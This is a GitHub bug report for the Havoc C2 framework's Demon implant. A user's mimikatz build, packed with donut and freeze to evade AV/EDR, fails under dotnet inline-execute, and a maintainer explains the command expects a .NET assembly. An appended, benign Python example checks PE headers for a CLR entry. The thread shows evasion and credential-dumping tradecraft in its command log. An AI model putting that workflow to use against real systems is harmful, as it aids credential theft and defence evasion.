HavocFramework / Havoc

The Havoc Framework.
GNU General Public License v3.0

[File a bug report for the Demon Implant]: Dotnet inline execute issue #417

Closed pentestuser72 closed 7 months ago

pentestuser72 commented 8 months ago

What happened?

dotnet inline execute does not work when binaries have been run through donut and freeze to bypass AV/EDR. They execute fine on disk manually; however, they do not work when run through the inbuilt demon dotnet inline execute.

Did You Try With the Dev Branch?

Yes (You tried using the dev branch but the problem persists)

Relevant log output

20/10/2023 18:19:11 [5pider] Demon » dotnet inline-execute /home/kali/Desktop/safekatz.exe
[] [046E1F93] Tasked demon to inline execute a dotnet assembly: /home/kali/Desktop/safekatz.exe
[+] Send Task to Agent [166 bytes]
[] Using CLR Version: v4.0.30319
[!] Failed to execute assembly or initialize the clr

20/10/2023 18:32:52 [5pider] Demon » shell C:\Windows\Temp\safekatz.exe
[] [F42E0135] Tasked demon to execute a shell command
[+] Send Task to Agent [156 bytes]
[+] Received Output [403 bytes]:

  .#####.   mimikatz 2.2.0 (x64) #19041 Sep 19 2022 17:44:08
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /** Benjamin DELPY gentilkiwi ( benjamin@gentilkiwi.com )
 ## \ / ##       > https://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
  '#####'        > https://pingcastle.com/ / https://mysmartlogon.com/ ***/

mimikatz #

Did You Read Over Your Issue First?

S4ntiagoP commented 7 months ago

dotnet inline-execute expects a .NET assembly (meaning a C# executable), that is why this is failing.
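
Added example (not part of the thread and not Havoc code): the distinction in the reply above is visible in a file's PE headers, because a .NET assembly carries a non-empty CLR runtime header entry (data directory 14) and a native executable does not. The function name, the `sample_pe` helper and the header-only sample images are constructed for this illustration.

```python
import struct

CLR_DIR_INDEX = 14  # IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR (CLR runtime header)

def is_dotnet_assembly(data: bytes) -> bool:
    """Return True if the PE optional header declares a CLR runtime header."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return False
    (e_lfanew,) = struct.unpack_from("<I", data, 0x3C)
    opt = e_lfanew + 4 + 20  # skip the "PE\0\0" signature and 20-byte COFF header
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0" or len(data) < opt + 2:
        return False
    (magic,) = struct.unpack_from("<H", data, opt)
    if magic not in (0x10B, 0x20B):  # PE32 / PE32+
        return False
    dirs = opt + (96 if magic == 0x10B else 112)  # start of the data directories
    entry = dirs + 8 * CLR_DIR_INDEX
    if len(data) < entry + 8:  # truncated header
        return False
    (count,) = struct.unpack_from("<I", data, dirs - 4)  # NumberOfRvaAndSizes
    rva, size = struct.unpack_from("<II", data, entry)
    return count > CLR_DIR_INDEX and rva != 0 and size != 0

def sample_pe(managed: bool, pe32_plus: bool = True) -> bytes:
    """Constructed header-only PE image for the demo (not a runnable binary)."""
    fixed = 112 if pe32_plus else 96  # optional header size before directories
    dos = b"MZ" + b"\0" * 0x3A + struct.pack("<I", 0x40)
    coff = struct.pack("<HHIIIHH", 0x8664 if pe32_plus else 0x14C,
                       0, 0, 0, 0, fixed + 128, 0x22)
    opt = bytearray(fixed + 128)  # 16 data directories of 8 bytes each
    struct.pack_into("<H", opt, 0, 0x20B if pe32_plus else 0x10B)
    struct.pack_into("<I", opt, fixed - 4, 16)
    if managed:  # constructed RVA and size for the CLR header entry
        struct.pack_into("<II", opt, fixed + 8 * CLR_DIR_INDEX, 0x2008, 0x48)
    return dos + b"PE\0\0" + coff + bytes(opt)

if __name__ == "__main__":
    for label, image in (("managed", sample_pe(True)), ("native", sample_pe(False))):
        print(label, "->", is_dotnet_assembly(image))
```
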